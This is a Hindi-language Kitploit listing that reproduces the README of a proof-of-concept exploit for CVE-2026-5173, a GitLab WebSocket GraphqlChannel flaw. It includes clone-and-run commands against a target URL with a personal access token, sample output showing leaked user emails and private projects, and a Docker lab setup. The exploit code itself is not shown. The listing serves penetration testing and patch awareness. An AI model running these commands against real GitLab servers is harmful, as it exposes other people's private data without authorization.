Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5173 — CVE-2026-5173 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-5173
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHub0xblackash/cve-2026-5173

CVE-2026-5173

CVE-2026-5173

रिपॉजिटरी देखें
115 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🦊 CVE-2026-5173: GitLab WebSocket अनधिकृत विधि निष्पादन PoC

Linux Vulnerability (5) (1)

CVE Badge PoC Affected Versions Python

GitHub stars License


🛠️ अवलोकन

CVE-2026-5173 निम्न-विशेषाधिकार वाले प्रमाणित हमलावर को GitLab के WebSocket (/-/cable) एंडपॉइंट के माध्यम से, विशेष रूप से GraphqlChannel के ज़रिए, प्रतिबंधित बैकएंड विधियों को कॉल करने की अनुमति देता है।

इससे संवेदनशील डेटा उजागर होना (उच्च गोपनीयता) और सीमित अनधिकृत कार्य हो सकते हैं।

प्रभावित संस्करण

  • GitLab CE/EE: 16.9.6 से 18.8.8
  • 18.9 18.9.5 से पहले
  • 18.10 18.10.3 से पहले

पैच इनमें किया गया: 18.8.9 • 18.9.5 • 18.10.3


⚡ विशेषताएँ

  • स्वच्छ और आधुनिक Python 3 PoC
  • आसान एक-कमांड उपयोग: python3 CVE-2026-5173.py http://target:8080
  • स्वचालित WebSocket कनेक्शन + GraphqlChannel सदस्यता
  • एकाधिक विधि गणना (currentUser, users, projects, आदि)
  • Personal Access Token के लिए समर्थन
  • सुंदर रंगीन आउटपुट
  • केवल अधिकृत लैब / पेंटेस्ट उपयोग के लिए सुरक्षित

🚀 त्वरित आरंभ

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-5173.git
cd CVE-2026-5173

2. PoC चलाएँ

root@kitploit:~
python3 CVE-2026-5173.py http://your-gitlab-lab:8080

टोकन के साथ (अनुशंसित):

root@kitploit:~
python3 CVE-2026-5173.py http://target.com:8080 -t glpat-XXXXXXXXXXXXXXXXXXXX

📸 स्क्रीनशॉट

सफल आउटपुट का उदाहरण:

root@kitploit:~
[+] CVE-2026-5173 PoC v2 - Target: http://192.168.1.100:8080
[+] WebSocket connected
[+] Subscribed to GraphqlChannel
[*] Testing method: currentUser
[SUCCESS] Possible unauthorized access via 'currentUser'!
    → Response: {"result":{"data":{"currentUser":{"id":"gid://gitlab/User/123","name":"Normal User","email":"[email protected]"}}}...

[*] Testing method: users
[SUCCESS] Possible unauthorized access via 'users'!
    → Response: {"result":{"data":{"users":{"nodes":[ {"id":"gid://gitlab/User/1","name":"Admin","email":"[email protected]"}, ... ]}}}  ← This leaks all users including admins!

[*] Testing method: projects
[SUCCESS] Possible unauthorized access via 'projects'!
    → Response: long list of ALL projects (even private ones you shouldn't see)

📋 उपयोग

root@kitploit:~
python3 CVE-2026-5173.py <target> [options]

Arguments:
  target                Target URL (e.g. http://gitlab.example.com:8080)
  -t, --token           GitLab Personal Access Token (API scope)
  -h, --help            Show this help message

🧪 लैब सेटअप (अनुशंसित)

root@kitploit:~
docker run -d --name gitlab-vuln \
  -p 8080:80 -p 2222:22 \
  gitlab/gitlab-ce:18.10.2-ce.0

फिर एक सामान्य उपयोगकर्ता बनाएँ और PoC चलाएँ।


⚠️ कानूनी एवं अस्वीकरण

  • यह PoC केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
  • इसका उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
  • अनधिकृत उपयोग अवैध और कानून के विरुद्ध है।
  • किसी भी दुरुपयोग के लिए मैं ज़िम्मेदार नहीं हूँ।

📚 संदर्भ

  • आधिकारिक GitLab पैच रिलीज़: https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
  • CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2026-5173
  • GitHub एडवाइज़री: https://github.com/advisories/GHSA-5gj7-3j23-w2h2

सुरक्षा समुदाय के लिए ❤️ के साथ निर्मित
यदि आपको यह उपयोगी लगा तो रिपॉजिटरी को ⭐ स्टार करें!

अस्वीकरण: निर्माण के समय कोई सार्वजनिक विस्तृत एक्सप्लॉइट उपलब्ध नहीं था। यह एक शोध-स्तरीय PoC है।

टूल डाउनलोड करें